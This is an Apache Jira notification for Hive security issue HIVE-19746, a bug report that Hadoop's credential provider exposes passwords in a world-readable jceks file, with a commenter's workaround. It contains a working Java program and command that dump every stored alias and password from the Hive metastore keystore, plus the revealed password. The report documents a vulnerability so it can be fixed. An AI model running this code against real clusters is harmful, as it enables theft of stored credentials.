[ https://issues.apache.org/jira/browse/HIVE-19746?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16939030#comment-16939030 ]
Thejas Nair commented on HIVE-19746: ------------------------------------ The jceks file can be stored in local filesystem, to avoid this issue. > Hadoop credential provider allows to read passwords for every user > ------------------------------------------------------------------ > > Key: HIVE-19746 > URL: https://issues.apache.org/jira/browse/HIVE-19746 > Project: Hive > Issue Type: Bug > Components: Security > Reporter: Oleksiy Sayankin > Assignee: Oleksiy Sayankin > Priority: Blocker > > This simple program allows to read any password from any {{jceks}} file: > {code} > package com.test.app; > import java.util.List; > import org.apache.hadoop.conf.Configuration; > import org.apache.hadoop.security.alias.CredentialProvider; > import org.apache.hadoop.security.alias.CredentialProviderFactory; > import java.io.IOException; > public class PasswordReader { > public static void main(String[] args) throws IOException { > if (args == null || args.length == 0){ > throw new IllegalArgumentException("Credential provider path is to > set"); > } > String credentialProviderPath = args[0]; > Configuration configuration = new Configuration(); > configuration.set(CredentialProviderFactory.CREDENTIAL_PROVIDER_PATH, > credentialProviderPath); > CredentialProvider credentialProvider = > CredentialProviderFactory.getProviders(configuration).get(0); > List<String> aliases = credentialProvider.getAliases(); > for(String alias : aliases){ > System.out.println(alias + " = " + new > String(configuration.getPassword(alias))); > } > } > } > {code} > {code} > java -cp $(hadoop classpath):password-reader.jar com.test.app.PasswordReader > jceks://hdfs/user/hive/hivemetastore.jceks > {code} > *RESULT* > {code} > javax.jdo.option.connectionpassword = 123456 > {code} > File {{jceks://hdfs/user/hive/hivemetastore.jceks}} has {{\-rw\-r\-\-r\-\-}} > permissions and {{hdfs:hdfs}} owner:group. We can't remove world readable > permissions here, because Hive is configured for impersonation to allow users > user than {{hdfs}} connect to HiveServer2. When removed world readable > permissions and tried to connect as other user, I got the exception: > {code} > 2018-05-31T10:08:40,191 ERROR [pool-7-thread-41] fs.Inode: Marking failure > for: /user/hive/hivemetastore.jceks, error: Input/output error > 2018-05-31T10:08:40,192 ERROR [pool-7-thread-41] fs.Inode: Throwing exception > for: /user/hive/hivemetastore.jceks, error: Input/output error > 2018-05-31T10:08:40,192 ERROR [pool-7-thread-41] > metastore.RetryingHMSHandler: java.lang.RuntimeException: Error getting > metastore password: null > at > org.apache.hadoop.hive.metastore.ObjectStore.getDataSourceProps(ObjectStore.java:485) > at > org.apache.hadoop.hive.metastore.ObjectStore.setConf(ObjectStore.java:279) > {code} > Any ideas how to protect passwords (let's say restrict access to > {{jceks://hdfs/user/hive/hivemetastore.jceks}} to {{600}}) and at the same > time be available to connect to HS2 as not admin user? -- This message was sent by Atlassian Jira (v8.3.4#803005)